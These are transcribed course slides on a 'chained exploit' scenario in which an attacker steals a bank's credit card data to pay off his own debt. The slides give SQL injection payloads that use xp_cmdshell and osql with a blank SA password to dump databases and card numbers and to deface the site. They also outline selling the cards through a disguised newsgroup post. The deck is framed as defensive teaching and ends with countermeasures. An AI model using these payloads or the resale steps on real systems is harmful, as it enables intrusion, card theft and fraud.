1 / 21

TEL 283

TEL 283. Getting out of Credit Card Debt. Resources Utilized. Chained Exploits Whitaker, Evans, Voth ; Addison-Wesley, 2009. Ethics. Methods discussed in course are considered illegal

Download Presentation

TEL 283

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. TEL 283 Getting out of Credit Card Debt

  2. Resources Utilized • Chained Exploits • Whitaker, Evans, Voth; Addison-Wesley, 2009

  3. Ethics • Methods discussed in course are considered illegal • Under no circumstances should tools or methods be utilized on any networked system without the explicit written permission of an authorized grantor within that organization • Document should be witnessed and should delineate the boundaries of your actions • Signed document for this course indicating that you understand and appreciate the nature of the concepts and methodologies

  4. Ethics • What is the purpose of instructing these methods and tools? • So that you, as a professional, will understand the methods and tools and be able to determine • When and how they were leveraged against you • Find traces of them during an investigation • Pro-actively search and deter an attack

  5. What is a “Chained Exploit”? • Attack consisting of several exploits or attacks in order to achieve a goal

  6. Credit Card debt • “Phoenix” (obviously not his real name) is in debt for thousands of dollars to a bank’s credit card system, and his rate has just gone up to 29% • Plans to pay off his debt by hitting the bank’s system (PDXO Financial) • If he uses another person’s card to pay off his, it’ll be noticed • Plans to steal cc information and sell it on the black market

  7. Steps • Enumerate the website • Enumerate the cc database • Get cc info from the website • Sell the cc info on the underground market • Trash to website (misdirection)

  8. Enumerate the website • Uncover as much information about the website as possible • Operating system • Web server version running • RFC 2616 specifies the format of the HTTP responses • Some headers returned might contain valuable information regarding the server or site

  9. Enumerate the website • Telnet to the website on port 80 (or whatever port the site is on) telnet www.PDXOfinancial.com 80 • Once connected • Issue the command to receive the site’s HTTP header HEAD / http /1.1 [cr] [cr] • Server type might be revealed • Example show www.marist.edu “HEAD” request

  10. GoolagScan • Tool developed by the Cult of the Dead Cow • www.cultdeadcow.com • Uses Google hacking techniques discovered by Johnny Long (johnny.ihackstuff.com) • Checks strings against website to find files containing passwords, vulnerable files, or directories of interest

  11. Background information • PDXO merged • Might have development websites running due to changes • development.PDXOfinancial.com • beta.PDXOfinancial.com • test.PDXOfinancial.com • dev.PDXOfinancial.com • Checking possible sites might result in bringing up an unprotected web page • In this case, the login form

  12. Enumerate the CC Database • Is the DB server on the same host as the website? • Is MS SQL server used for DB? • Default username of “SA” w/o password? • Is the website installed in the default IIS location? • inetpub\wwwroot • This directory allows for write access • This presumes several weaknesses • Possible due to page coming from a development site • Moral: build security in, even during the development phase of the SDLC

  13. SQL Injection • The ability of a user to craft an SQL or database command from the client side

  14. Uncover the names of the databases • The default database is called “MASTER” • Get the names of the databases in the MASTER file select * from master..sysdatabases • The database expects a username prior to this command, so we need to fool the database into thinking we’ve already done this • Supply a command terminator character “;” before the select command ; select * from master..sysdatabases • Prevent another command from being entered after this by adding a “comment” indicator after the command “--” ; select * from master..sysdatabases --

  15. OSQL • The difficulty with the sql command is that the output would not return • Use “osql”, which is a command line utility • Send the output to a text file • Parameters for osql • -U username • -P password (blank if none supplied) • -Q enter SQL command and exit • -o output file specified osql –U sa –P “” –Q “select * from master..sysdatabases” –o c:\inetpub\wwwroot\output.txt

  16. OSQL • osql is a command line utility and needs to be entered at the command prompt • Hacker is not at a command prompt • Can use an SQL stored procedure which will execute a command • exec xp_cmdshell ‘<command goes here>’ • So… exec xp_cmdshell ‘osql –U sa –P “” –Q “select * from master..sysdatabases” –o c:\inetpub\wwwroot\output.txt’ --

  17. SQL Injection • Phoenix uses the form to submit his SL command to the webserver • Webserver passes along the command to the database server for execution w/o verification • Text file is written to the webserver’s document directory • Phoenix changes the URL to that of the output file on the server in order to browse the contents • Examine the contents and see if there are any databases of interest creditcards C:\Program Files\Microsoft SQL Server\MSSQL\data\creditcards.MDF

  18. SQL Injection • Now that you have the name of the database • Get the table names by changing the SQL command select * from creditcards..sysobjects • One of the tables is called “cardnumbers” select * from creditcards..cardnumbers • The dumped information will be in the output file on the IIS server • Contains names, expiration dates, CVV’s, CC numbers, and PINs

  19. Selling CC Information • Phoenix uses NNTP client (NewsRover) to check alt.2600 newsgroup • Post a message regarding sale of cc info • Set up a bogus email address • getyourcardshere@gmail.com • Use “spammimmic” to disguise a spammed message • Looks like a spam message, but those in the know will recover the hidden message using spammimmic • Can be passwroded with a password or as phony PGP message, or false Cyrillic text • This message is posted to alt.2600 using the phony email address • Respondent agrees to pay $12,000 into a Swiss account • Phoenix’s CC number is one of the many cards sold • Phoenix cancels his card

  20. Defacing the Website • IIS 5.0 Server • MS SQL Server • Default username of SA w/o password • Hosted on the same host as the website • xp_cmdshell stored procedure will be used to overwrite the landing page on the website ;exec xp_cmdshell ‘echo You’ve been hacked! > c:\inetput\wwwroot\default.asp’ --

  21. Countermeasures • Change the default HTTP Response header • Do not allow public access to the development sites • Do not keep the SQL server on the same host as the IIS server • “Sanitize” / validate user form input • Don’t put IIS in the default location • Make the site read-only • Don’t keep unnecessary stored procedures • Don’t use defaults (username / passwords) for the database

More Related